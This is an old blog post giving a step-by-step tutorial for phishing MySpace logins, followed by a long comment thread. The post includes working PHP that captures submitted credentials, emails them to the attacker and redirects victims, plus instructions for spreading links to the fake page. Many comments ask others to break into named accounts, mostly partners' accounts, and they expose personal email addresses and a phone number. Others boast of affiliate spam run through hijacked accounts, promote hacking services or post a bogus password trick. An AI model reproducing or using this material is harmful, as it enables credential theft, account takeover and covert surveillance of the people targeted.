There are many security vulnerabilites and loopholes in the MySpace social network that can easily be exploited. The whole entire architecture was built using Cold Fusion. MySpace was a great concept, however when it was originally being built no one, not even Tom knew that MySpace would get nearly as big as it did. What was meant to be a simple free site where people could create profiles for fun turned into a massive empire. It quickly grew to over 200 million users and just as much money in annual advertising revenue. Spammers, affiliate marketers, and cpc advertisers saw MySpace as a gold mine. They could inject their ads into the myspace architecture and easily reach millions of people for free. This simple site turned many hackers/spammers into millionaires over night.
MySpace saw these viral marketers as being parasites who were out to exploit their social network and profit off of it however they could. So they started increasing their security to prevent spam and viral marketing inside their network. However, it was fairly easy for these hackers/spammers to change their methods to stay one step ahead of the new security features.
One security vulnerability in particular has proven to be very difficult to block. This loop hole has compromised all of the social networking sites, online banking, ebay, paypal, and even credit card and investment websites. This trick is known as phishing and it can take many forms such as fake webpages, fake emails, or fake popup windows all which ask the user to provide secure information under the assumption that the email or website is from the actual site that they are trying to access.
The Process
The first thing that you need to do is go to the main www.MySpace.com page where people typically log into their MySpace accounts.
When you get to this login page do a view source and open up the raw html source in notepad.
Select “Edit” from the topnav of notepad and select the “Find” option. Do a find for <form. In this “<form” tag replace the action attribute to “submit.php”.
So you will be replaceing:
<form action=”http://secure.myspace.com/index.cfm?fuseaction=login.process” method=”post” id=”LoginForm” name=”aspnetForm”>
With the following:
<form action=”submit.php” method=”post” id=”LoginForm” name=”aspnetForm”>
Once you have made this simple change in notepad save the document to your desktop and name it “MySpace.html” or using a similar file name of your choosing. You will use this page as a fake MySpace login page.
Now you will have to build the file, submit.php, to receive the login information from the fake login page in notepad with the following code:
<html><body>
<?php
// Capture the Email Address and Password from the login page.
$email = $_POST[’ctl00$Main$SplashDisplay$ctl00$Email_Textbox’];
$password = $_POST[’ctl00$Main$SplashDisplay$ctl00$Password_Textbox’];
// Email the captured Email Address and Password to your email address.
// Replace the value in the “$to” field with your actual email address.
$to = “youremail@yourdomain.com”;
$subject = “My Space Login Info”;
$body = “Email: “. $email . ” Password: ” . $password . “.<br />”;;
if (mail($to, $subject, $body)) {
//echo(”<p>Message successfully sent!</p>”);
} else {
//echo(”<p>Message delivery failed…</p>”);
}
// Redirect to the real MySpace login page.
?>
<META HTTP-EQUIV=”REFRESH” CONTENT=”1;URL=http://www.myspace.com”>
</body></html>
This php file does three different actions. First it captures the email address and password provided on the fake MySpace page, then it will email the username and password to the email address specified in the “$to” field, and finally it will redirect back to MySpace.
Be sure to put your email address in the $to field above when editing this file.
Save this file to your desk top and name it submit.php.
Now log into your hosting company’s control panel and upload both the MySpace.html login page and the submit.php action page to a location on your webserver where it can be viewed on the internet.
Type the URL of the location where you placed the MySpace.html page and make sure that all the images and flash videos appear on the page correctly. You may need to add “http://www.myspace.com” if there are any relative links to image or flash items on this fake MySpace login page. However, I have found that most of the images and flash videos have absolute paths which make doing this convenient because all images and flash videos will be pulled directly off the actual myspace site for your fake login page.
Now log into your actual myspace account.
Send either a comment, an email, a bulletin, or a forum/blog post asking people to check out something really cool. Create a link to this cool page offering the free items using the following format Cool Offer Link.
So when this person(s) clicks on this link they will be redirected to your fake login page and think that MySpace dropped their session. They will login on your fake page and it will email you their email address and password behind the scenese without them realizing it. They will be redirected back to MySpace and think that they have just logged into the site or they will be asked to log in again.
You will now have their username and password. This trick can be applied to all social networking such as facebook, stumble, digg, etc. and may require adjustments to be made to work well or to account for new security features to prevent people from doing this trick. However, this type of loophole is very difficult to block if you are create enough about where you can inject these links into their site and how well you can make the login page resemble the actual login page of the site you are trying to break into.
So next time you log into MySpace make sure that the address in your browser’s address bar is actually http://www.myspace.com and not some other site with a fake login page.
These types of links can also be sent to people by email. Ebay, Paypal, and many banking and credit card sites have also been hacked into using these concepts above. It will be nearly impossible to eliminate this type of security vulnerability with naive users.
Below Jared the subway guy will explain this fast and easy step-by-step process on how to hack into people’s myspace accounts.
I have seen lots of hacking attempts of this nature out there lately. Lots of emails asking people to verify their accounts and then taking them to a fake login page where their credentials are stolen.
It happened to a friends bank account and this person was able to empty their entire count with this info. Fortunately Citibank has identity theft protection and gave the money back.
hey can some one get me the password to www.myspace.com/muse_2012
plz he hacked mine if u do get his password tell me it send the pass word to ali-614@live.com plz and thank u
I am NOT the subway guy, ok?
and you’re welcome for the video! 
A year ago, the same situation happened to e-gold customers. Russian hackers created a clone page of E-Gold.com and cleaned few user accounts.. My money has also been stolen, but not on a fake page. I believe keylogger was hidden i a picture i received..
thanks for the “hacker`s guide”!
I get a lot of messages from hacked Myspace-accounts.
It’s called Phishing, and only noobs fall for it. Aside from that, it’s also illegal.
ENJOY YOUR BAN.
this is not good. but thanks for sharing.
thass Scary Shit BatGirl*
+ i thought U were a “Nice One”*
heheheheeeeeeeee*
;PPP xoxo
i got everything and then im stuck at the part where you upload the html and php, i dont have those accounts. how do you get them / do that?
I am guessing that you will need some sort of hosting plan on a webserver somewhere.
I would recommend signing up for Host Monster.
umm host moster is not free…so how do you get the fake myspace login page to show as a web page?
I wanna know if I can use this same idea to just take people’s login info w/o making it about ads.
did u ever find out where it the submit.php goes??
submit.cfm does a form post to the following page:
secure.myspace.com/index.cfm?fuseaction=login.process
Just do a “view source” by right clicking on the page and look where the form action is being submitted in the html returned by the php or cfm file and you can find out where the page content is being submitted.
Im pretty sure this josh guy is moving in on my girlfriend. they r best friends, but i think he’s taking it farther. can anyone please get the email and password to myspace.com/7844079
and email it to christopher_grinstead@csumb.edu
it would mean everything to me
thank you soo much!!
where do u post the codes at in ur myspace file
I made lots of money by doing affiliate marketing through hacked myspace accounts.
I had a deal with CJ.com where I would get paid $3 for each college survey that was filled out and I would post bulletins asking people to enter the college survey contest saying that they won really cool prizes.
People would see this message from their friends and assume the contest was legit and fill out the short simple form. I made over $1,100 in a single day doing this once and over $16K that month doing other types of affiliate marketing for commission.
Jewspace is too cheap to allow people to leach off their network in this manner. They would rather hoard all the money themselves.
could someone teach me how to hack into my own myspace i forgot my password and that emial is an alod one. pleasse my new emial is selinc13@comcast.net
thank you!
where do u post the code after u change the notepad
Now myspace is doing that annoying thing where it prevents you from leaving their site and this stupid warning with Tom pops up giving you a message on phishing sites. This makes advertising and affiliate marketing from your myspace account really difficult.
i have tried this before and have been surprised at how many gullible people are out there.
You have posted nice stuff. I liked it very much. Feal free to post such things. Thanks
Hey guys I just wanted to let everyone know that I have used ATX to hack my BF myspace and they actually sent me his password in less than 20 min.
http://myspacehacking.net
hey wats i umm cant seem to get into ALX can u hack into someone’s account for me ?
can u help me learn this hackin stuff,i think my girl is checkin and i wanna see if its with my friend,,plz
So are U still on Holidaze Natalie* ;))
Very good breakdown of the whole process.
Obviously no one is barely going to use this method anymore, as Myspace has realised such a big problem it was causing and in turn have made many countermeasures to prevent their occurrences. Most notably they know telltale signs of such messages and have the ability to block them. Funnily enough, on the real login pages Myspace warns people to check the URL of the login page to check that they are always with Myspace.com and not another site like in your method; yet still the scammers themselves put this image up their because not only does it look even more realistic but people don’t even check in the first place! They deserve to get scammed to be honest.
Great lesson though!
how do i put it into my webserver?
What does this mean >>>”Now log into your hosting company’s control panel and upload both the MySpace.html login page and the submit.php action page to a location on your webserver where it can be viewed on the internet.”
It’s funny reading these comments. These people are so stupid and they think they can hack someone’s myspace account.
how the hell do u do it???!!!
how do u log into ur hosting companys control panel?? dont u need 2 be admin???? IM CONFUSED. PLZ HELP!!???
i need a name of a free hosting website..
anyone got any?
Can anyone vouch for myspacehacking.net ? Jennifer recommended it a few posts up the staircase?????
this will no longer work if you send the link through a bulletin or a myspace message, because myspace warns you whenever you are linked to an external page now.
You would have to get someone to go to your page outside of myspace.
ok so i’m not even going to try to use this method, im sure myspace has figured it out so if you have another idea email me C_Mama17@yahoo.com
i need to get a password for a myspace account and its urgent.
o if think your going to hack into my email have fun. . .
How do you create the file (submit.php)
Please HELP. Im stuck at the part where you build the file: SUBMIT.PHP
Some one help me for Gods sake. PLEASE !!!!
can u please hack into someones myspace for me i would greatly appriciate it. thanks
Just kidding, i am the subway guy!
I know I’m not going to be able to do this on my own so is anyone interested in hacking a myspace profile for me?
Only if it’s free though!
It’s really important.
xoxo
I have your site for its useful and funny content and simple design.
wtf does build the file mean?
please help I’ll be up all night. some one who knows what they are doing call me at (909) 246 2057. This is how desperate i am !!!!
man this is harder than it looks…..
i need some help doing this…
so can you guys please help!=]
hey, can someone tell me how to upload those files to the server? that’s the only part i’m confused with.
hey, can someone tell me how to upload those files to the server? that’s the only part i’m confused with.
hey, can someone tell me how to upload those files to the server? that’s the only part i’m confused with.
alright everything is done, but i cant seem to find the spot in the source code to input the myspace url to enable the flash object on the page.
anyone know where it is?
heres my site with missing flash object
that’s great but i can’t do that cos i have a mac computer and my view source won’t let me edit in it.
Now log into your hosting company’s control panel and upload both the MySpace.html login page and the submit.php action page to a location on your webserver where it can be viewed on the internet.
you get EVERYONE confused at THAT part
can u hack in to http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=389494762 for me this girl made a profile of me and she is making me look bad and stuff the email to get in to it is jordan.morriss90@yahoo.com but i dont know the password send me an email if u get it or just delete the profile for me thank u
Thanks for the tip. Interesting.
There seem to be alto of noobs who need to do some remedial web research… especially those who have no idea about web hosting and servers.
Do some research kiddos.
Plz would you get me the password & the email of this page the URl is 170966200
plz
and send it to leydiyamileth@hotmail.com
lol wth!?! I got so lost after I built in the file thing haha I need help
ok i got everything till the point were you login to your hosting company’s controll pannel and save the documents to it i dont get it.. id apreciate it if you would make it a bit more specific pleas and thanks.. email me back at k_k13s0w@yahoo.com
Hey guys I just wanted to say if you need anyone to hack a myspace account I have used ATX to hack my GF and they sent me the password in less than 4 hours. Thought I would share.
atxseo.com
I know how to solve your problem.
First, the trick is to trick the system into thinking that you’re the administrator.
When you send an email to ( myspace_finder@hotmail.com )
Type this in the subject 5675456email=(youremail)%6342
Put the Friend ID of the person’s password you want.
Then at the bottom type in 67843544Password=(yourpassword)%35646
Then once you’ve sent the email, they should send you a email back asking you to “change your password” for the person’s myspace password you want to know!
simple as that.
ok ill send you my e-mail and
password lol
haha solution thats a good 1
i like your effort i must say
Could you or anyone else give me an example of what solution is talking about. I’m not quite sure I see what he is saying. Is the friend ID in the message or in the subject? What bottom am I supposed to put the last part? Find me, if not here, at kollektivefolk@hotmail.com
thanks
hi i was wondering if you could write the new php.
for the new look my space ?
for some reson it does not work , but yet every thing els does .. can you help ???
my e-mail is (ablackjesus@hotmail.com)
thnaks
Hey, can you please help me hack someone’s account? please write me back at woozyjane@yahoo.com and I’ll give you the details on whose myspace to hack
Need help getting my fiance’s myspace login e-mail and password. She claims it is old and she never uses it. She is out of town and I see her online all the time and she denies. I need someones help before I make a big mistake. It there is nothing there then Great. Please e-mail me at jitc1@aol.com if you can help. It will be deeply appreciated!!!
wolf
Im pretty sure this josh guy is moving in on my girlfriend. they r best friends, but i think he’s taking it farther. can anyone please get the email and password to myspace.com/7844079
and email it to christopher_grinstead@csumb.edu
thank you soo much!!
hey i have some ideas on how to do it diffrent with an actual web page i already did it but everything works exept it doesnt send the mail and password to my mail
!!please help!! thanks…………my email : mariaureta69@yahoo.com
yeah dude i have the same prob it all works well
but with the new look myspace the codes are different and it doesn’t sign in properly and i never get the email or the page being redirected
so yer can any one help ??
hey can someone hack xolilshorty06ox 4 me